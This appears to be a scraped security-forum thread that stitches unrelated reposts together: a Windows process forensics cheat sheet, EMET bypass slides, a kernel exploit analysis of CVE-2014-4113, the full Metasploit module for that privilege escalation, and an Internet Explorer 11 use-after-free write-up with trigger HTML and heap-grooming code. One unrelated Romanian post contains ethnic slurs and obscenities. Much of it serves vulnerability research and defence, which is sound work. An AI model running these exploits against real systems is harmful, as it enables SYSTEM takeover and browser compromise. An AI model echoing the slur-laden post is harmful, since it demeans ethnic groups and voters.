we publish future articles concerning iOS 8.1, new iterations of Apple’s latest firmware, as well as future updates to the Pangu Untethered 8.1 jailbreak utility. Sursa: Easy Jailbreak 8.1 Untethered Tutorial With Cydia - One-Click Pangu

Know your Windows Processes or Die Trying I have been talking with quite a few people lately tasked with “security” inside their organizations and couldn’t help but notice their lack of understanding when it came to Windows process information. I figured if the people I have talked with don’t understand then there are probably a lot more people that don’t understand. I’m guessing quite a few people that consider themselves “experts” as well. I decided to write this post in an effort to help the individuals that may not have the knowledge, free time, training budgets, etc. to explore Windows processes. For about $50 – $75 (few books) and some free time you can learn pretty much everything needed to know about Windows processes. My goal isn’t to dive very deep into each of the processes. I figured a bulleted “cheat sheet” vs. wordy descriptions will be best for my intended audience. The people that want to dive deeper can buy themselves a copy of Windows Internals, 6th Edition Part I and II, fire up Process Explorer/Process Hacker, start reading the great documentation by the Volatility team (references below). Note: The information below focuses on Windows 7 processes as more and more organizations are *finally* starting to migrate away from Windows XP. I wanted to give those folks a head start. Let’s break it down…. Idle and System Created by ntoskrnl.exe via the process manager function, which creates and terminates processes and threads. No visible parent processes System has a static PID of 4 System creates smss.exe There should only be one system process running SMSS – Session Manager First user mode process Parent process is System Base Priority of 11 Username: NT AUTHORITY\SYSTEM Performs delayed file delete/rename changes Loads known dlls Runs from %systemroot%\System32\smss.exe Creates session 0 (OS services) Creates session 1 (User session) Creates csrss and winlogon then exits, which is why they have no parent process and they both have session ids of 1 Runs within session 0 Only one smss.exe process should be running at one time. The second smss.exe process exits, so you will only see the one running in session 0. There can be more sessions if more users are logged on to the system. 0 and 1 are for a single user logged onto the system. CSRSS.EXE – Client/Server Run Windows subsystem process. Base Priority of 13 %SystemRoot%\system32\csrss.exe Username: NT AUTHORITY\SYSTEM Creates/Deletes processes and threads, Temp files, etc. In XP its used to draw text based console windows. Under Windows 7, the conhost process now does that functionality. For example, cmd.exe One csrss process per session Its name is often used by malware to hide on systems (CSSRS.EXE, CSRSSS.EXE, etc.) Runs within session 0 WININIT.EXE – Windows Initialization Process Parent to services.exe (SCM), lsass.exe and lsm.exe Created by smss.exe, but since smss.exe exits there is no parent to WININIT. Base Priority of 13 Username: NT AUTHORITY\SYSTEM %SystemRoot%\system32\wininit.exe Performs user-mode initialization tasks Creates %windir%\temp Runs within session 0 SERVICES.EXE – Service Control Manager Child to WININIT.EXE Parent to services such at svchost.exe, dllhost.exe, taskhost.exe, spoolsv.exe, etc. Services are defined in SYSTEM\CurrentControlSet\Services %SystemRoot%\System32\wininit.exe Username: NT AUTHORITY\SYSTEM Base Priority of 9 Loads a database of services into memory Runs within session 0 There should only be one services.exe process running LSASS.EXE – Local Security Authority Child to WININIT.EXE Only one lsass.exe process %SystemRoot%\System32\lsass.exe Responsible for local security policy to include managing users allowed to login, password policies, writing to the security event log, etc. Often targeted by malware as a means to dump passwords. Also mimicked by malware to hide on a system (lass.exe, lssass.exe, lsasss.exe, etc.). These “fake” names will not be a children of wininit.exe. Base Priority of 9 Username: NT AUTHORITY\SYSTEM Runs within session 0 It should not have child processes SVCHOST.EXE – Service Hosting Process Multiple instances of svchost.exe can/do exist/run %SystemRoot%\System32\svchost.exe Username: Should only be one of three options: NT AUTHORITY\SYSTEM, LOCAL SERVICE, or NETWORK SERVICE Should always have a parent of services.exe Base Priority of 8 Often mimicked (scvhost, svch0st, etc.) When they are mimicked they will not be running as children to services.exe. Command Line: svchost.exe -k <name> -k <name> values should exist within the Software\Microsoft\Windows NT\CurrentVersion\Svchost registry key Often times when malware uses the actual svchost.exe to load their malicious service they will not include -k command line parameters and be running under a username that does not match on of the three listed in bullet 3. They should all be running within session 0 LSM.EXE – Load Session Manager Service Manages the state of terminal server sessions on the local machine. Sends the requests to smss.exe to start new sessions. Child to wininit.exe It should not have child processes Receives logon/off, shell start and termination, connect/disconnects from a session, and lock/unlock desktop I have not personally seen malware try and impersonate LSM.exe, but there is always a first so keep your eyes open. %systemroot%\System32\lsm.exe Base Priority of 8 Username: NT AUTHORITY\SYSTEM Runs within session 0 WINLOGON.EXE – Windows Logon Process No parent process Could have a child process of LogonUI if smartcard, etc. are used to authenticate LogonUI will terminate once the user enters their password. Once password is entered the verification is sent over to LSASS and it’s verified via Active Directory or SAM (the registry hive SAM), which stores local users and group information. Base Priority of 13 Runs within session one Handles interactive user logons/logoffs when SAS keystroke combination is entered (Ctrl+Alt+Delete) Loads Userinit within Software\Microsoft\Windows NT\CurrentVersion\Winlogon The userinit value in the registry should be: Userinit.exe, (note the comma). Malware will sometimes add additional values to this key, which will load malware upon successful logons. Userinit.exe exits once it runs so you wont see this process running when you look. Userinit initializes the user environment. This includes running GPOs and logon scripts. Will run Shell value located at Software\Microsoft\Windows NT\CurrentVersion\Winlogon within the registry. The value of shell should be Explorer.exe. Malware will also use this sometimes to execute malware by adding values. Since Userinit exists this is also why Explorer.exe doesn’t have a parent process. Explorer.exe – AKA Windows Explorer No parent process since Userinit.exe exits The value “Explorer.exe” is stored in shell value within the registry. The registry location is here: Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell Base Priority of 8 Username: The logged on user account. %Systemroot%\Explorer.exe This will contain multiple child processes. Some of you might know this better as, “Windows Explorer” This process is often targeted by malware. Malware will often times inject this process. One indication of this is if Explorer.exe is connecting out to the internet. There are other indicators, but that’s another post. We are keeping it simple here. Let’s sum this post up by creating a simple checklist to review while looking for malicious/suspect process activity. Check the parent/child relationships of processes. Check which users names the processes are running under Check their command line parameters for those processes that use them. Check their digital signatures Check their base priorities Check the location they are being from Check their spellings Leverage memory analysis to detect hidden and/or injected process. Some malware can hide processes by unlinking them (among other ways). Memory analysis is a must these days. When you get comfortable with everything here, dig deeper and check what modules are typically loaded for each process. Check and see if processes that should not be connecting out to the internet are not Check process privileges If wscript.exe process is running check the command line of what it is running. Investigate processes running inside %temp%, root of %appdata%, %localappdata%, recycle bin, etc. If rundll32.exe is running check its command line as well. “Most” legitimate user applications like Adobe, Web browsers, etc. don’t spawn child processes like cmd.exe. If you see this, they should be investigated. Core Windows processes shouldn’t be communicating out to the internet. If you see communication from these processes, dig deeper. Look for suspicious URLs/IPs, check process strings, etc. So yeah, that’s a quick run down. I’m sure I forgot some stuff so just hit me up via email if I missed something, or got something wrong. I’ve been wanting to get this out of my head and on-to paper for quite awhile. I’m working on some IOCs that will incorporate all this. They will be posted here: https://github.com/sysforensics/IOCs If you want to learn more about the “internals” of Windows processes and memory analysis order this book – http://www.amazon.com/gp/product/1118825098 and take the Volatility Memory Analysis course. Enjoy! References: Windows Internals 6th Edition, Part I – http://www.amazon.com/Windows-Internals-Part-Covering-Server%C2%AE/dp/0735648735 Windows Internals 6th Edition, Part II Windows Internals, Part 2 (6th Edition) (Developer Reference): Mark Russinovich, David Solomon, Alex Ionescu: 9780735665873: Amazon.com: Books Windows Exploratory Surgery with Process Hacker by Jason Fossen http://blogs.sans.org/windows-security/files/Process_Hacker_SANS_Jason_Fossen.pdf The Volatility team and their Documentation https://code.google.com/p/volatility/ Volatility Labs Sursa: https://sysforensics.org/2014/01/know-your-windows-processes.html

[h=3]Microsoft EMET - Armor against zero-days bypassed again | Conference Slides[/h]New methods make it possible to circumvent protection mechanisms of Microsoft EMET 5.0 The EMET (Enhanced Mitigation Experience Toolkit) tool developed by Microsoft makes it possible for administrators and end users to retroactively equip applications with additional protection mechanisms. This enhanced protection is intended to prevent various attack techniques that are currently used by cyber attackers. Security expert René Freingruber of the SEC Consult Vulnerability Lab has developed numerous methods to get around the basic protection mechanisms of EMET in all currently available versions. If a cyber-attacker were to use these new bypass methods, serious attacks could be carried out. A software product protected with EMET as a workaround affected by a critical zero-day vulnerability could, for example, fall under the control of attackers. Microsoft was informed of this by SEC Consult and is working on an improvement to the protection methods. The experts of the SEC Consult Vulnerability Lab advise you to not view EMET as an unbeatable protection measure, because the tool can definitely be bypassed with the help of newly discovered methods. SEC Consult considers it as necessary for software manufacturers to make the development of applications more secure and to regularly test their software extensively for application security. [h=3] Demo video[/h] A video demonstrating the issues has been released: http://youtu.be/TuBQnvnKKHY [h=3] Slides[/h] Detailed slides from previous conferences, where the research has been presented by René Freingruber, are available here: RuxCon, 11-12 October 2014 Short bio/description: https://ruxcon.org.au/speakers/#Ren%C3%A9%20Freingruber Slides: http://prezi.com/z0kjt1wi_9nl/ruxcon-2014-emet-50-armor-or-curtain/ ToorCon, 25-26 October 2014 Short bio/description: http://sandiego.toorcon.net/conference/#7 Slides: http://prezi.com/qodsslaplj7j/toorcon-2014-emet-50-armor-or-curtain/ Sursa: SEC Consult: Microsoft EMET - Armor against zero-days bypassed again | Conference Slides

[h=1]Windows 8.1 Security Internals[/h] Date: October 28, 2014 from 5:00PM to 6:15PM Day 1 Hall 8.0 Room B1 WIN-B411 Speakers: Chris Jackson [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality MP4 file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality MP4 file. If you have a Windows Phone, iPhone, iPad, or Android device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” Slides (view online) High Quality MP4 (iPad, PC, Xbox) MP4 (iPhone, Android) Windows continues to innovate on its implementation of core operating system security. To achieve the conflicting goals of security and compatibility, it can be complex. How do you understand how it works? Join "The App Compat Guy" for a deep dive into the operating system internals where security decisions begin. This is an operating system internals session, and not a packaged software session. Sursa: Windows 8.1 Security Internals | TechEd Europe 2014 | Channel 9

AFD.SYS DANGLING POINTER VULNERABILITY Pwn2Own 2014 TABLE OF CONTENTS Affected OS ......................................................................................................................................................................... 2 Overview ............................................................................................................................................................................. 2 Impact ................................................................................................................................................................................. 2 Technical Analysis ............................................................................................................................................................... 3 POC code ......................................................................................................................................................................... 3 Vulnerability Analysis ...................................................................................................................................................... 4 Step 1 - IOCTL 0x1207f ................................................................................................................................................ 5 Step 2 - IOCTL 0x120c3 ............................................................................................................................................... 8 Exploitation ..................................................................................................................................................................... 9 READ-/WRITE-Primitives through WorkerFactory Objects ....................................................................................... 10 Controlled Data on NonPagedPoolNx Pool ............................................................................................................... 11 Leak Target ............................................................................................................................................................... 12 Single-Gadget-ROP for SMEP Evasion ....................................................................................................................... 12 Shellcode ................................................................................................................................................................... 13 Putting it all together ................................................................................................................................................ 13 Patch Analysis ................................................................................................................................................................... 14 Download: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf

@Andrei

Cum am primit 50 de lei ca s?-l aplaud pe Victor Ponta | Iulia Marin | adevarul.ro

Daca nu mergeti la vot demonstrati ca sunteti prosti, ignoranti si ca nu va pasa de tara in care traiti. Si nici de voi. Ulterior va plangeti de presendinte, dar nu realizati ca din cauza voastra se ajunge asa. Nu demonstrati nimanui nimic. Nu o sa ii pese nimanui ca ies la vot doar 30% dintre persoanele cu drept de vot dintre care jumatate sunt bozgori, tigani si babe proaste. Astia or sa va decida viitorul pentru ca voi stati in fata monitorului si dati la laba. Asadar, pe viitor, cand nu va convine ceva in tara ganditi-va la urmatorul gand pe care vi-l ofer cu drag: SUGETI PULA.

CVE-2014-4113 Detailed Vulnerability and Patch Analysis Posted on: 24 October 2014 By: siteadm As you might have heard, Microsoft recently patched some vulnerabilities; vulnerabilities related to Sandworm CVE-2014-4114 (Powerpoint exploit) and font parsing (CVE-2014-4148). But in this article, I'm more interested to talk about CVE-2014-4113, which is a local kernel vulnerability that successful exploitation would give you SYSTEM access. So I started analyzing patch (KB3000061) and mid-analysis, I found a PoC for this vulnerability in the wild. Therefore I combined my patch analysis and reverse engineering of PoC binary together to deeply understand this vulnerability and exploitation technique. Here, I'll share it step by step, with all details, so you'll know everything about CVE-2014-4113. First of all, I downloaded KB3000061 and I noticed that it just does have win32k.sys inside. So I created two folders called Vulnerable and Patched and placed vulnerable and patched versions of win32k.sys inside them. Next, I loaded both of them in IDA and saved both databases. As next step I had to see what've changed in patched version, so I chose TurboDiff for this job. TurboDiff simply gives you a plain-text table of changed functions. For this particular patch, it gave me 25 changed function. I started checking each changed function and one of them caught my attention. In the internal function of xxxHandleMenuMessages, I noticed that patched version does have an additional check for returned value from xxxMNFindWindowFromPoint (internal function). That check was a call to IsMFMWFPWindow function and parameter to IsMFMWFPWindow was exactly return value of xxxMNFindWindowFromPoint. So I figured out that here something was wrong and Microsoft added a code to check return value of xxxMNFindWindowFromPoint. You can see change here: Vulnerable win32k.sys Patched version: Take a look at both functions with zoom out, vulnerable part: Patched part: Knowing this, I started to think about exploitation method of this vulnerability, how to trigger this vulnerability and make xxxHandleMenuMessages API to call xxxSendMessage with an invalid HANDLE. As soon as I saw that the vulnerability is related to window system and possible NULL value during xxxHandleMenuMessage process, I just remembered this. For exploiting that, you had to map zero/null page, create a fake object at zero page and trigger the vulnerability. So this was the general idea, now I had to find a way to trigger this vulnerability by causing xxxHandleMenuMessage call xxxSendMessage with a NULL handle. Luckily I suddenly saw that there is a PoC published online for this vulnerability, so as a lazy person, instead of trying to solve it on my own as a practice/challenge, I just downloaded the sample and started to analyze it. Lots of things was as I thought, the only missing part in chain of exploitation was how to make that NULL in xxxHandleMenuMessage. It was done by hooking and altering parameters in user mode, you can read more about these tricks here and here. So basically the PoC deletes the menu and returns -5, so xxxSendMessage will use a tagWND object starting from -5 (0xFFFFFFFB) to positive values which is in user-mode. The PoC allocated zero-page using ZwAllocateVirtualMemory with 0x01 as base address and writes a fake tagWND object here. Windows allows zero page allocation for 16-bit application compatibility/support. So the tagWND object have two important parts, one is WS_EXECUTE_IN_KERNEL flag which is at offset ((BYTE*)&pWnd->state)+0x02 and the other one is callback function which is at offset 0x60. So by setting 0x16 to 0x04, you are telling kernel that the callback function at 0x60 needs to be executed in kernel. So the PoC modifies return value (returns -5) by hooking, but before that, it writes 0x04 to 0x16 - 0x05 (0x11) offset (WS_EXECUTE_IN_KERNEL flag) and address of shellcode at 0x60 - 0x05 (0x5B) -which will be executed in kernel-. See: The shellcode does nothing other than replacing current process token with SYSTEM process (pid = 4) token. Therefore, any process created by current process will have SYSTEM token too. Here is the shellcode: and here is what zero page looks like: Cyan color holds address of shellcode and yellow background holds WS_EXECUTE_IN_KERNEL flag. For triggering the vulnerability, simply it creates two layer popup menu (one main popup menu and one sub menu inside it), then it calls TrackPopupMenu to trigger the hook. In hook function, it replaces window handler using SetWindowLongA API, see: and new handler function, simply deletes popup menu and returns 0xFFFFFFFB (-5): That was it. Using this simple hooking and altering popup menu, kernel will call and execute callback function at null page, in kernel space. I think I've said enough about this bug. So please update your OS, specially servers, as soon as possible, because lowest access (for example ASP.NET shell with ASP.NET user account) can get SYSTEM access using this vulnerability. Sursa: https://www.codeandsec.com/CVE-2014-4113-Detailed-Vulnerability-and-Patch-Analysis

[h=1]Windows TrackPopupMenu Win32k NULL Pointer Dereference[/h] ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # vulnerability discovery and exploit in the wild 'juan vazquez', # msf module (x86 target) 'Spencer McIntyre' # msf module (x64 target) ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ # Tested on (32 bits): # * Windows XP SP3 # * Windows 2003 SP2 # * Windows 7 SP1 # * Windows 2008 [ 'Windows x86', { 'Arch' => ARCH_X86 } ], # Tested on (64 bits): # * Windows 7 SP1 # * Windows 2008 R2 SP1 [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2014-4113'], ['OSVDB', '113167'], ['BID', '70364'], ['MSB', 'MS14-058'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'] ], 'DisclosureDate' => 'Oct 14 2014', 'DefaultTarget' => 0 })) end def check os = sysinfo["OS"] if os !~ /windows/i return Exploit::CheckCode::Unknown end if sysinfo["Architecture"] =~ /(wow|x)64/i arch = ARCH_X86_64 elsif sysinfo["Architecture"] =~ /x86/i arch = ARCH_X86 end file_path = expand_path("%windir%") << "\\system32\\win32k.sys" major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") # Neither target suports Windows 8 or 8.1 return Exploit::CheckCode::Safe if build == 9200 return Exploit::CheckCode::Safe if build == 9600 if arch == ARCH_X86 return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build) else return Exploit::CheckCode::Detected if build == 7601 end return Exploit::CheckCode::Unknown end def exploit if is_system? fail_with(Exploit::Failure::None, 'Session is already elevated') end if check == Exploit::CheckCode::Safe fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") end if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") if target.arch.first == ARCH_X86 dll_file_name = 'cve-2014-4113.x86.dll' else dll_file_name = 'cve-2014-4113.x64.dll' end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name) library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end Sursa: http://www.exploit-db.com/exploits/35101/

USE-AFTER-FREE NOT DEAD IN INTERNET EXPLORER: PART 1 In HITCON X, we talked about bypassing new exploit mitigation in Internet Explorer. In this post, we will use a use-after-free vulnerability which has been patched in MS14-056 to explain how to bypass memory protection and isolated heap in Windows 8.1. Let's look into the following code first: <!DOCTYPE html> <html> <head> <title>test</title> <script> function listener(event) { head.removeNode(true); } function test() { var object = document.createElement("object"); head = document.getElementsByTagName("head")[0]; head.applyElement(object, "inside"); object.addEventListener("error", listener, false); var range = document.createRange(); range.setStartAfter(object); range.insertNode(object); object["innerHTML"] = object["innerHTML"]; document.write(""); } </script> </head> <body onload="test()"></body> </html> Internet Explorer 11 will crash here with page heap enabled and memory protection disabled: (29c.98c): Access violation - code c0000005 (!!! second chance !!!) eax=00000005 ebx=07530fe8 ecx=04109fc0 edx=04151cd4 esi=00000005 edi=04109fc0 eip=613fb9fc esp=03eaa89c ebp=03eaa8a4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 MSHTML!CElement::GetFirstCp+0x7: 613fb9fc 8b411c mov eax,dword ptr [ecx+1Ch] ds:0023:04109fdc=???????? 0:005> !heap -p-a ecx address 04109fc0 found in _DPH_HEAP_ROOT @ 40b1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 40b16e4: 4109000 2000 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\verifier.dll - 6e258fc2 verifier!VerifierDisableFaultInjectionExclusionRange+0x00003232 770e48fc ntdll!RtlDebugFreeHeap+0x00000032 770a5ed1 ntdll!RtlpFreeHeap+0x00069d01 7703be35 ntdll!RtlFreeHeap+0x00000485 6159def9 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122 614a0bb5 MSHTML!CNoShowElement::`vector deleting destructor'+0x0000002d 610359df MSHTML!CBase::SubRelease+0x0000002e 6146c702 MSHTML!CElement::Release+0x00000018 61442fdd MSHTML!CSpliceRecordList::~CSpliceRecordList+0x0000006e 61050506 MSHTML!CDoc::CutCopyMove+0x00002181 610d3f58 MSHTML!RemoveWithBreakOnEmpty+0x00000068 6105243d MSHTML!InjectHtmlStream+0x0000021b 6100226e MSHTML!HandleHTMLInjection+0x00000091 61476894 MSHTML!CElement::InjectInternal+0x000002a9 6104f7ad MSHTML!CElement::InjectTextOrHTML+0x0000016d 6104fa09 MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x00000056 6cef8e9d jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000165 6cef9712 jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x0000006b 6cf471af jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x000000bd 6cf46ea2 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040 6cf46ee3 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d 6cf478fc jscript9!Js::InterpreterStackFrame::Process+0x00002d6d 6cef6548 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x000001e8 0:005> k ChildEBP RetAddr 03eaa8a4 61677ba1 MSHTML!CElement::GetFirstCp+0x7 03eaa8c4 61479cec MSHTML!CTitleElement::Notify+0x5d4c84 03eaadf4 6105248c MSHTML!CDoc::CutCopyMove+0x1b4b 03eaaf44 6100226e MSHTML!InjectHtmlStream+0x26a 03eaaf88 61476894 MSHTML!HandleHTMLInjection+0x91 03eab080 6104f7ad MSHTML!CElement::InjectInternal+0x2a9 03eab100 6104fa09 MSHTML!CElement::InjectTextOrHTML+0x16d 03eab128 6cef8e9d MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x56 03eab190 6cef9712 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x165 03eab1b0 6cef967e jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x6b 03eab1f8 6cf471af jscript9!Js::JavascriptOperators::CallSetter+0x76 03eab220 6cf46ea2 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0xbd 03eab240 6cf46ee3 jscript9!Js::JavascriptOperators::OP_SetProperty+0x40 03eab27c 6cf478fc jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x4d 03eab5c8 6cef6548 jscript9!Js::InterpreterStackFrame::Process+0x2d6d 03eab704 07620fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 WARNING: Frame IP not in any known module. Following frames may be wrong. 03eab710 6cef6ce9 0x7620fd9 03eaba58 6cef6548 jscript9!Js::InterpreterStackFrame::Process+0x1cd7 03eabb74 07620fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 03eabb80 6cef0685 0x7620fe1 03eabbc8 6cef100e jscript9!Js::JavascriptFunction::CallFunction<1>+0x88 03eabc34 6cef0f60 jscript9!Js::JavascriptFunction::CallRootFunction+0x93 03eabc7c 6cef0ee7 jscript9!ScriptSite::CallRootFunction+0x42 03eabca4 6cef993c jscript9!ScriptSite::Execute+0x6c 03eabd00 6cef9878 jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb 03eabd18 610fb78f jscript9!ScriptEngineBase::Execute+0x1c 03eabdcc 610fb67c MSHTML!CListenerDispatch::InvokeVar+0x102 03eabdf8 610fb21e MSHTML!CListenerDispatch::Invoke+0x61 03eabe90 6159cfe0 MSHTML!CEventMgr::_InvokeListeners+0x1a2 03eabea8 61469d60 MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42 03eabf30 610fb385 MSHTML!CEventMgr::_InvokeListeners+0xe5 03eac0a0 60ef98bb MSHTML!CEventMgr::Dispatch+0x35a 03eac0c8 60f2f149 MSHTML!CEventMgr::DispatchEvent+0x8c 03eac0f8 60f2f774 MSHTML!COmWindowProxy::Fire_onload+0x120 03eac158 60f2ea16 MSHTML!CMarkup::OnLoadStatusDone+0x412 03eac16c 60f2e2e3 MSHTML!CMarkup::OnLoadStatus+0xc2 03eac5b0 60f290bd MSHTML!CProgSink::DoUpdate+0x4a7 03eac5bc 60e81f12 MSHTML!CProgSink::OnMethodCall+0x12 03eac600 60e68dda MSHTML!GlobalWndOnMethodCall+0x12c *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\user32.dll - 03eac64c 76e675b3 MSHTML!GlobalWndProc+0x15c 03eac678 76e677b8 user32!gapfnScSendMessage+0x18b 03eac6f8 76e679e6 user32!gapfnScSendMessage+0x390 03eac758 76e6783b user32!DispatchMessageW+0x1bb *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\IEFRAME.dll - 03eac764 67478eb4 user32!DispatchMessageW+0x10 03eaf930 674b0a07 IEFRAME!DllCanUnloadNow+0x1541 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\iertutil.dll - 03eaf9e8 6fcc6bac IEFRAME!SetQueryNetSessionCount+0x486 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Internet Explorer\IEShims.dll - 03eaf9f8 6e21bcf2 iertutil!Ordinal101+0x3b7 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\KERNEL32.DLL - 03eafa24 753917ad IEShims!IEShims_CreateWindowEx+0x3607 03eafa30 77063af4 KERNEL32!BaseThreadInitThunk+0x12 03eafa74 77063acd ntdll!__RtlUserThreadStart+0x20 03eafa84 00000000 ntdll!_RtlUserThreadStart+0x1b It's a CTitleElement use-after-free vulnerability. However, Internet Explorer won't crash if we enable memory protection, so we add CollectGarbage2 into the code: <!DOCTYPE html> <html> <head> <title>test</title> <script> function CollectGarbage2() { var button = document.createElement("button"); button.title = new Array(100000).join("0"); button.title = null; CollectGarbage(); } function listener(event) { head.removeNode(true); } function test() { var object = document.createElement("object"); head = document.getElementsByTagName("head")[0]; head.applyElement(object, "inside"); object.addEventListener("error", listener, false); var range = document.createRange(); range.setStartAfter(object); range.insertNode(object); object["innerHTML"] = object["innerHTML"]; CollectGarbage2(); document.write(""); } </script> </head> <body onload="test()"></body> </html> Internet Explorer 11 will crash here: (418.172c): Access violation - code c0000005 (!!! second chance !!!) eax=04959fc0 ebx=049a1b00 ecx=06437fe8 edx=04959ff8 esi=049cffc0 edi=046fac08 eip=61003419 esp=046fabd4 ebp=046fabec iopl=0 nv up ei ng nz na pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010287 MSHTML!CTitleElement::Notify+0xcd: 61003419 8b02 mov eax,dword ptr [edx] ds:0023:04959ff8=???????? We've bypassed memory protection obviously. Let's look into MSHTML!CTitleElement::Notify: .text:63857828 loc_63857828: .text:63857828 test eax, eax .text:6385782A jz short loc_63857834 .text:6385782C cmp eax, esi .text:6385782E jnz loc_63783416 .text:63783416 loc_63783416: .text:63783416 lea edx, [eax+38h] .text:63783419 mov eax, [edx] ; retrieve freed CTitleElement and use .text:6378341B jmp loc_63857828 We need to control 0x38 of CTitleElement accordingly. In HITCON X, we manipulate LFH to bypass isolated heap in Windows 7. However, Windows 8 introduces frontend allocation randomization, so manipulating LFH is not a good solution. But backend allocation is not randomized, which can be used to bypass isolated heap. Let's look into the following code first: <!DOCTYPE html> <html> <head> <script> function CollectGarbage2() { var button = document.createElement("button"); button.title = new Array(100000).join("0"); button.title = null; CollectGarbage(); } var junk = new Array(); for (var i = 0; i < 4; i++) { junk[i] = document.createElement("title"); } var title = new Array(); for (var i = 0; i < 4; i++) { title[i] = document.createElement("title"); } title[2] = null; CollectGarbage2(); CollectGarbage2(); // 1 </script> <title>test</title> <script> function listener(event) { head.removeNode(true); } function test() { // 2 var object = document.createElement("object"); head = document.getElementsByTagName("head")[0]; head.applyElement(object, "inside"); object.addEventListener("error", listener, false); var range = document.createRange(); range.setStartAfter(object); range.insertNode(object); object["innerHTML"] = object["innerHTML"]; title[0] = null; title[1] = null; title[3] = null; CollectGarbage2(); CollectGarbage2(); // 3 var area = new Array(); for (var i = 0; i < 0x11; i++) { area[i] = document.createElement("area"); } for (var i = 0; i < 0x11; i++) { area[i].shape = "rect"; area[i].coords = "1094795585,1094795585,1094795585,1094795585"; } // 4 document.write(""); } </script> </head> <body onload="test()"></body> </html> We disable page heap 